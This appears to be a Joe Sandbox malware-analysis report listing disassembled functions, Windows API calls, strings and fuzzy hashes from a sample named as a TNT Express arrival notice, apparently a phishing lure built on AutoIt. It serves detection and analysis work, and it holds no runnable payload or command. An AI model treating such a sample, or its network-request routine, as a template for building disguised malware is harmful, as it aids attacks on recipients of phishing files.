Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-3080491070
Opcode ID: 1625595c0adac11006562a051e8813931f9778b30b32c34eea6c5659f54634a1
Instruction ID: f9bbebd6a4ffab0a5bd648948b75a5210337fefedf2a5e129d9c891432ca3415
Opcode Fuzzy Hash: 1625595c0adac11006562a051e8813931f9778b30b32c34eea6c5659f54634a1
Instruction Fuzzy Hash: F2519F7190020AAADF14EBA4DD46EEEB778FF04344F108169F505B2162EB31AF58DF62

Function 0092B5C8 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 142COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 0092B5FC
_wcslen.LIBCMT ref: 0092B608
_wcslen.LIBCMT ref: 0092B64D
_wcslen.LIBCMT ref: 0092B68C
_wcslen.LIBCMT ref: 0092B6C7

Strings

EXISTS, xrefs: 0092B686, 0092B68B
REMOVE, xrefs: 0092B602, 0092B607
KEYS, xrefs: 0092B647, 0092B64C
APPEND, xrefs: 0092B6C1, 0092B6C6

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 1256254125-769500911
Opcode ID: 423d0812853a81c4510554628a76e01fcea77e82e96e77e431afa2da27c7f220
Instruction ID: 7c78da5c0097d338fe8b7d44b91fc245fcf54fb3abd4f73c3d0f616034c734ec
Opcode Fuzzy Hash: 423d0812853a81c4510554628a76e01fcea77e82e96e77e431afa2da27c7f220
Instruction Fuzzy Hash: 1441E632A001379ACB206F7DD8905BE7BF9FF61768B244129E566DB288E735CD81C790

Function 00935393 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 009353A0
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00935416
GetLastError.KERNEL32 ref: 00935420
SetErrorMode.KERNEL32(00000000,READY), ref: 009354A7

Strings

NOTREADY, xrefs: 0093544B
READY, xrefs: 00935460, 00935468
READONLY, xrefs: 00935452
INVALID, xrefs: 00935459
UNKNOWN, xrefs: 00935444

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 5f87e62e31321d9abb46839fc40fb2b31001ed56c34917f4ab3e46804a4b7f50
Instruction ID: 2069b2760ee822b73c57995605ae902fb4699d75b4c2149fc7318be3c37f4591
Opcode Fuzzy Hash: 5f87e62e31321d9abb46839fc40fb2b31001ed56c34917f4ab3e46804a4b7f50
Instruction Fuzzy Hash: 80318D75A006049FC714DF68C888FAABBB8FB49305F158069E805CF2A2D775DD86CF91

Function 00953C46 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON

Download Yara Rule

APIs

CreateMenu.USER32 ref: 00953C79
SetMenu.USER32(?,00000000), ref: 00953C88
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00953D10
IsMenu.USER32(?), ref: 00953D24
CreatePopupMenu.USER32 ref: 00953D2E
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00953D5B
DrawMenuBar.USER32 ref: 00953D63

Strings

0, xrefs: 00953C54
F, xrefs: 00953D4E

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup
String ID: 0$F
API String ID: 161812096-3044882817
Opcode ID: ce0a83a5aa717f1892a82f7d4bf92e3f6c809bda6116b3d7803b09b9513984d4
Instruction ID: 7e60af8e49ae714715036e6fdc11d1f32b407774e8101387907a878ac8ff68f5
Opcode Fuzzy Hash: ce0a83a5aa717f1892a82f7d4bf92e3f6c809bda6116b3d7803b09b9513984d4
Instruction Fuzzy Hash: E541AD74A05309AFDB14CFA6D844B9A77B9FF49381F044029FD46973A0D730AA04DF90

Function 00953A23 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00953A9D
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00953AA0
GetWindowLongW.USER32(?,000000F0), ref: 00953AC7
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00953AEA
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00953B62
SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00953BAC
SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00953BC7
SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00953BE2
SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00953BF6
SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00953C13

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: MessageSend$LongWindow
String ID:
API String ID: 312131281-0
Opcode ID: dd3a35d965593a9c40031ec6806c9b7b42af84bad73bcc6af6366fc7561f6d48
Instruction ID: 66343550d2bbadf90d3ec1fa0c3e695de6482341aa26697407c6683efdb82e73
Opcode Fuzzy Hash: dd3a35d965593a9c40031ec6806c9b7b42af84bad73bcc6af6366fc7561f6d48
Instruction Fuzzy Hash: 96617975A00248AFDB11DFA9CC81FEE77B8EB49700F10419AFA15E72A1C774AE45DB50

Function 0092B12F Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0092B151
GetForegroundWindow.USER32(00000000,?,?,?,?,?,0092A1E1,?,00000001), ref: 0092B165
GetWindowThreadProcessId.USER32(00000000), ref: 0092B16C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0092A1E1,?,00000001), ref: 0092B17B
GetWindowThreadProcessId.USER32(?,00000000), ref: 0092B18D
AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,0092A1E1,?,00000001), ref: 0092B1A6
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0092A1E1,?,00000001), ref: 0092B1B8
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,0092A1E1,?,00000001), ref: 0092B1FD
AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,0092A1E1,?,00000001), ref: 0092B212
AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,0092A1E1,?,00000001), ref: 0092B21D

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 2a18a00500fab548827cc58b7bef703795e3ee4668892427e4d74798f478894c
Instruction ID: 28f7ee1573f4e74a5652975192ed9ac842c0b1a98747dfd09689bb7c2e9ae9c9
Opcode Fuzzy Hash: 2a18a00500fab548827cc58b7bef703795e3ee4668892427e4d74798f478894c
Instruction Fuzzy Hash: 683187B1528314FFDB109F29EC88BAE7BEDAB61312F10800AFA11D6191D7B49A40DF60

Function 008F2C80 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 008F2C94

Part of subcall function 008F29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,008FD7D1,00000000,00000000,00000000,00000000,?,008FD7F8,00000000,00000007,00000000,?,008FDBF5,00000000), ref: 008F29DE
Part of subcall function 008F29C8: GetLastError.KERNEL32(00000000,?,008FD7D1,00000000,00000000,00000000,00000000,?,008FD7F8,00000000,00000007,00000000,?,008FDBF5,00000000,00000000), ref: 008F29F0

_free.LIBCMT ref: 008F2CA0
_free.LIBCMT ref: 008F2CAB
_free.LIBCMT ref: 008F2CB6
_free.LIBCMT ref: 008F2CC1
_free.LIBCMT ref: 008F2CCC
_free.LIBCMT ref: 008F2CD7
_free.LIBCMT ref: 008F2CE2
_free.LIBCMT ref: 008F2CED
_free.LIBCMT ref: 008F2CFB

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 9442ccd14ce70474ca56af9ca60478eb8a8dc83a1f8da7e74c627fb6f7f6fc96
Instruction ID: 3a3e44f414935ef1b9895ed34ae362305283183513d73614a6b7fdcc906ba943
Opcode Fuzzy Hash: 9442ccd14ce70474ca56af9ca60478eb8a8dc83a1f8da7e74c627fb6f7f6fc96
Instruction Fuzzy Hash: F311937624010DAFCB02EFA8D882DED3FA5FF05350F4144A5FA48DB222DA71EA509B91

Function 008C1410 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 008C1459
OleUninitialize.OLE32(?,00000000), ref: 008C14F8
UnregisterHotKey.USER32(?), ref: 008C16DD
DestroyWindow.USER32(?), ref: 009024B9
FreeLibrary.KERNEL32(?), ref: 0090251E
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0090254B

Strings

close all, xrefs: 008C1454

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 378cf7fcc2bb281635288470830132b2232914a3d004ee3fc262d427c93b3fbb
Instruction ID: 894c87463cc6fe2d0d0bd7dbaf9bd1c1f8676d142848ef6e3894fdcb1db6b89c
Opcode Fuzzy Hash: 378cf7fcc2bb281635288470830132b2232914a3d004ee3fc262d427c93b3fbb
Instruction Fuzzy Hash: 62D138716012128FCB29EF19C899F29F7A4FF05700F1442ADE54AAB292DB31ED12CF55

Function 00937DF0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00937FAD
SetCurrentDirectoryW.KERNEL32(?), ref: 00937FC1
GetFileAttributesW.KERNEL32(?), ref: 00937FEB
SetFileAttributesW.KERNEL32(?,00000000), ref: 00938005
SetCurrentDirectoryW.KERNEL32(?), ref: 00938017
SetCurrentDirectoryW.KERNEL32(?), ref: 00938060
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 009380B0

Strings

*.*, xrefs: 00938066

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile
String ID: *.*
API String ID: 769691225-438819550
Opcode ID: 1876df0aec5e5ca863266a5959ab8b7aff6802dd52051964874d5fe53dd6cdea
Instruction ID: 585abc294d3cd75900bfc641c1167431173026087fef5e9eb1ecabf6925d8ca5
Opcode Fuzzy Hash: 1876df0aec5e5ca863266a5959ab8b7aff6802dd52051964874d5fe53dd6cdea
Instruction Fuzzy Hash: 92817EB15083459BCB34EB55C884AAAF3E8FB89314F144C6EF889D7260EB74DD458F52

Function 008C5BEA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 008C5C7A

Part of subcall function 008C5D0A: GetClientRect.USER32(?,?), ref: 008C5D30
Part of subcall function 008C5D0A: GetWindowRect.USER32(?,?), ref: 008C5D71
Part of subcall function 008C5D0A: ScreenToClient.USER32(?,?), ref: 008C5D99

GetDC.USER32 ref: 009046F5
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00904708
SelectObject.GDI32(00000000,00000000), ref: 00904716
SelectObject.GDI32(00000000,00000000), ref: 0090472B
ReleaseDC.USER32(?,00000000), ref: 00904733
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 009047C4

Strings

U, xrefs: 00904693

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 7a6f4ea3e21c2c7a9b96d3c5e2e7d07f8f3b389927614c617040eb1b75344da3
Instruction ID: a020b51fe412a4898c133627afbc92721d4a6ec10eeb578b028665f742b373e3
Opcode Fuzzy Hash: 7a6f4ea3e21c2c7a9b96d3c5e2e7d07f8f3b389927614c617040eb1b75344da3
Instruction Fuzzy Hash: 5B71E1B1400209DFCF218F64C984EBA3BBAFF4A355F14426AEE559A2A6D731DC81DF50

Function 0093359C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 009335E4

Part of subcall function 008C9CB3: _wcslen.LIBCMT ref: 008C9CBD

LoadStringW.USER32(00992390,?,00000FFF,?), ref: 0093360A

Strings

^ ERROR, xrefs: 009336C9
Error: , xrefs: 009336EF
"%s" (%d) : ==> %s:, xrefs: 00933742
"%s" (%d) : ==> %s:%s%s, xrefs: 00933724
Line %d (File "%s"):, xrefs: 0093366B

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-2391861430
Opcode ID: 3b826503d50b406a5739e9e2d1dc7e37eda67a2722e10e580bfde9c92e7b7475
Instruction ID: 137626162e1ec255c4cf5da453e1b466236f38a368fdce054ef01b47ed4e4b04
Opcode Fuzzy Hash: 3b826503d50b406a5739e9e2d1dc7e37eda67a2722e10e580bfde9c92e7b7475
Instruction Fuzzy Hash: 16516D7194020AAADF14EBA4DC46FEEBB38FF44304F148169F105B21A1EB305B99DF62

Function 00958B02 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 008D9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 008D9BB2

Part of subcall function 008D912D: GetCursorPos.USER32(?), ref: 008D9141
Part of subcall function 008D912D: ScreenToClient.USER32(00000000,?), ref: 008D915E
Part of subcall function 008D912D: GetAsyncKeyState.USER32(00000001), ref: 008D9183
Part of subcall function 008D912D: GetAsyncKeyState.USER32(00000002), ref: 008D919D

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 00958B6B
ImageList_EndDrag.COMCTL32 ref: 00958B71
ReleaseCapture.USER32 ref: 00958B77
SetWindowTextW.USER32(?,00000000), ref: 00958C12
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00958C25
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 00958CFF

Strings

@GUI_DROPID, xrefs: 00958C51
@GUI_DRAGFILE, xrefs: 00958C9A

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID
API String ID: 1924731296-2107944366
Opcode ID: 0bcc376335f52b8cfd587c7a2546ee3f53c9d1e765f58774e1ae9e501fcc4e93
Instruction ID: f58ef873991b1d95273cce3f99a95cc9262a59661831f52d060dd691df358c23
Opcode Fuzzy Hash: 0bcc376335f52b8cfd587c7a2546ee3f53c9d1e765f58774e1ae9e501fcc4e93
Instruction Fuzzy Hash: D951AF70108304AFD704DF29DC56FAA77E4FB88755F000A2DF996A72E1DB709948DB62

Function 0093C253 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0093C272
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0093C29A
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0093C2CA
GetLastError.KERNEL32 ref: 0093C322
SetEvent.KERNEL32(?), ref: 0093C336
InternetCloseHandle.WININET(00000000), ref: 0093C341

Strings

, xrefs: 0093C2BB

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: 10b7040e4d39ce718b7a28a097a7b2513a4225ba1307e590533b13b87d0dadfe
Instruction ID: a544ddf36d2b784590939368238dfa9c8ea3a724db296a40b5bffb0ef7c57acd
Opcode Fuzzy Hash: 10b7040e4d39ce718b7a28a097a7b2513a4225ba1307e590533b13b87d0dadfe
Instruction Fuzzy Hash: FB3169F1604B08AFD7219FA58C88AAB7BFCEB49744F14851EF446A2200DB34DD059F61

Function 0092989B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00903AAF,?,?,Bad directive syntax error,0095CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 009298BC
LoadStringW.USER32(00000000,?,00903AAF,?), ref: 009298C3

Part of subcall function 008C9CB3: _wcslen.LIBCMT ref: 008C9CBD

MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00929987

Strings

Error: , xrefs: 00929955
Line %d:, xrefs: 00929912
., xrefs: 0092996D
%s (%d) : ==> %s.: %s %s, xrefs: 009298F1
Line %d (File "%s"):, xrefs: 0092992D

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: HandleLoadMessageModuleString_wcslen
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 858772685-4153970271
Opcode ID: 36ffa739bb6a423dee1a0ea19d30abc3d57d40b9d500f81a89a2c668ef68c0c1
Instruction ID: 2f8ec9e7ba58e593dd7cfea66e67282c1e83a80367bd32bcafecc856d1df73a1
Opcode Fuzzy Hash: 36ffa739bb6a423dee1a0ea19d30abc3d57d40b9d500f81a89a2c668ef68c0c1
Instruction Fuzzy Hash: A3218D3290431AAFCF15AFA4DC0AFEE7739FF18304F04446AF515A61A2EB319658DB11

Function 0092209F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 009220AB
GetClassNameW.USER32(00000000,?,00000100), ref: 009220C0
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0092214D

Strings

details, xrefs: 009220FB
list, xrefs: 0092212F
smallicons, xrefs: 00922115
largeicons, xrefs: 009220E1
SHELLDLL_DefView, xrefs: 009220CC

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: ClassMessageNameParentSend
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1290815626-3381328864
Opcode ID: a81d04280056a8eb4781c2cd7b15c50bbdf8ac351945441528976ca2d3e32c3e
Instruction ID: cdcf7a7fffff4f7161ebef275cb18017985a3774cc7ef6204b2077c0c683eb8f
Opcode Fuzzy Hash: a81d04280056a8eb4781c2cd7b15c50bbdf8ac351945441528976ca2d3e32c3e
